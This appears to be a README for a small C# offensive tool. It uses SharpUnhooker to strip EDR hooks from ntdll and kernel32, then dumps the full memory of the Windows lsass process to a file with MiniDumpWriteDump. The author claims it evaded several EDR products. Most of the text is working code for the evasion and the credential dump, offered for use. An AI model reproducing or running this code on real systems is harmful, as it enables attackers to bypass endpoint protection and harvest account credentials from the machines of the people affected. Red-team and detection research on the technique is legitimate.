Little program written in C# to bypass EDR hooks and dump the content of the lsass process. The code makes use of SharpUnhooker.
SharpUnhooker's project, created by GetRektBoy724, works the following way:
- It reads and copies the
.text sectionof the original (in-disk) DLL using "PE parser stuff" - It patches the
.text sectionof the loaded DLL usingMarshal.CopyandNtProtectVirtualMemoryfrom D/Invoke (to changes the permission of the memory) - It checks the patched in-memory DLL by reading it again and compare it with the original one to see if its correctly patched.
By just using SharpUnhooker and the MiniDumpWriteDump function, I was able to bypass multiple EDRs and managed to dump the content of lsass without being detected. This is the code that does the trick:
SilentUnhooker("ntdll.dll");
SilentUnhooker("kernel32.dll");
String dumpFileName = Directory.GetCurrentDirectory() + "\\" + "lsass.dmp";
if (System.IO.File.Exists(dumpFileName))
{
System.IO.File.Delete(dumpFileName);
}
IntPtr hFile = NativeMethods.CreateFile(dumpFileName, NativeMethods.EFileAccess.GenericWrite, NativeMethods.EFileShare.None, lpSecurityAttributes: IntPtr.Zero, dwCreationDisposition: NativeMethods.ECreationDisposition.CreateAlways, dwFlagsAndAttributes: NativeMethods.EFileAttributes.Normal, hTemplateFile: IntPtr.Zero);
NativeMethods._MINIDUMP_TYPE dumpType = NativeMethods._MINIDUMP_TYPE.MiniDumpWithFullMemory;
var proc = Process.GetProcessesByName("lsass").FirstOrDefault();
var exceptInfo = new NativeMethods.MINIDUMP_EXCEPTION_INFORMATION();
var result = NativeMethods.MiniDumpWriteDump(proc.Handle, proc.Id, hFile, dumpType, ref exceptInfo, UserStreamParam: IntPtr.Zero, CallbackParam: IntPtr.Zero);
if (result == true) {
Console.WriteLine("lsass process was successfully dumped in " + Directory.GetCurrentDirectory() + "\\" + "lsass.dmp");
}
else {
Console.WriteLine("Error dumping lsass process");
}